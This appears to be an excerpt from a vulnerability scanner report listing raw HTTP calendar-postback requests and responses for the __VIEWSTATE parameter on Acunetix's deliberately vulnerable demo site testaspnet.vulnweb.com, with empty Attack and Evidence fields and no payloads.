Request Body - size: 1,113 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8305&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgAAkjgboNoIZGRk5YAKJ8LymmdSGOgGhNvwHYOnOGU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKT4NO8DgLiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gJdZIlQqIlHBNQlVSCiDnHs%2FnggnQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:46:44 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgAAkjgboNoIZGRk5YAKJ8LymmdSGOgGhNvwHYOnOGU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKT4NO8DgLiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gJdZIlQqIlHBNQlVSCiDnHs/nggnQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:White" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1115 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,115 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8321&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgAALt%2BtrNoIZGRkhX%2FIzR4tnDRisTWssHRwKfKLOVM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKA89z0DgLiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gJEjSnDiPBUZ7v9n9iHFjcX1NkjFQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:29:15 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgAALt+trNoIZGRkhX/IzR4tnDRisTWssHRwKfKLOVM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKA89z0DgLiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gJEjSnDiPBUZ7v9n9iHFjcX1NkjFQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:White" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1119 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
